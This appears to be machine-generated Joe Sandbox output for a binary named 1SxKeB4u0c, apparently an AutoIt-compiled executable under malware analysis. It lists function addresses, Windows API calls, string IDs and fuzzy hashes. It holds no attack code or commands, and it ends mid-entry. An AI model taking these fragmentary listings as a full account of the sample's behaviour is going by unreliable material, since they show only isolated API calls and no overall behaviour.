                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                              • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                                              • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                              • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                                              Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                                              • _memcmp.LIBCMT ref: 00457748
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                              • String ID: ,,I
                                                                              • API String ID: 314563124-4163367948
                                                                              • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                              • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                                              • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                              • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                                              Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 00478613
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                              • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              • Opcode ID: 2544e0e6e0eb3ee9a4aea7e60e021619825295bcb15c4f144b35f19b0e29a79f
                                                                              • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                                              • Opcode Fuzzy Hash: 2544e0e6e0eb3ee9a4aea7e60e021619825295bcb15c4f144b35f19b0e29a79f
                                                                              • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                                              Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                              • _memset.LIBCMT ref: 00462B87
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              • Opcode ID: baa00e4f7c753b7648ee8ba48f54d13491d88a15e52df4396da6f2087478b23a
                                                                              • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                                              • Opcode Fuzzy Hash: baa00e4f7c753b7648ee8ba48f54d13491d88a15e52df4396da6f2087478b23a
                                                                              • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                                              Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$_free
                                                                              • String ID: 3cA$_A
                                                                              • API String ID: 2620147621-3480954128
                                                                              • Opcode ID: fd8546ffac857c8df334c2864b4835c237bf98cec62aa48c0cae0db1cd769040
                                                                              • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                                              • Opcode Fuzzy Hash: fd8546ffac857c8df334c2864b4835c237bf98cec62aa48c0cae0db1cd769040
                                                                              • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                                              Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$_memmove
                                                                              • String ID: 3cA$ERCP
                                                                              • API String ID: 2532777613-1471582817
                                                                              • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                              • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                                              • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                              • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                                              Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004627C0
                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                              • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                              • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                              • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                              Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 365058703-1403004172
                                                                              • Opcode ID: a786e04d0636fba0514ea34886b01ca4770f42ad727f30dc04a261e3ff9ae3b8
                                                                              • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                              • Opcode Fuzzy Hash: a786e04d0636fba0514ea34886b01ca4770f42ad727f30dc04a261e3ff9ae3b8
                                                                              • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                              Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                              • DestroyWindow.USER32(?), ref: 00486485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                              • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                              • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                              • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                              Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                              • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                              • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                              • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                              Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                              • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                              • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                              • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                              Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                              • __swprintf.LIBCMT ref: 0046ACC1
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                              • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                              • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                              • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                              Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID: @F
                                                                              • API String ID: 2875609808-2781531706
                                                                              • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                              • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                              • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                              • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                              Function 02F53FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02F53F73,00000003,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002), ref: 02F53FE2
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02F53FF5
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,02F53F73,00000003,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002,00000000), ref: 02F54018
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: c758df239733b6ed16a3d958ebe15a2acd145e33e304e6be494a58bb46863588
                                                                              • Instruction ID: 5b715958c2dae615bf60106bcc6aadf86e38dba6ddf47871c0a54b63a4d20775
                                                                              • Opcode Fuzzy Hash: c758df239733b6ed16a3d958ebe15a2acd145e33e304e6be494a58bb46863588
                                                                              • Instruction Fuzzy Hash: 68F04430D5022CBBDB119F54DC09BADFFB5EF44795F100154EA05A2150DB759AA4DA90
                                                                              Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                              • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
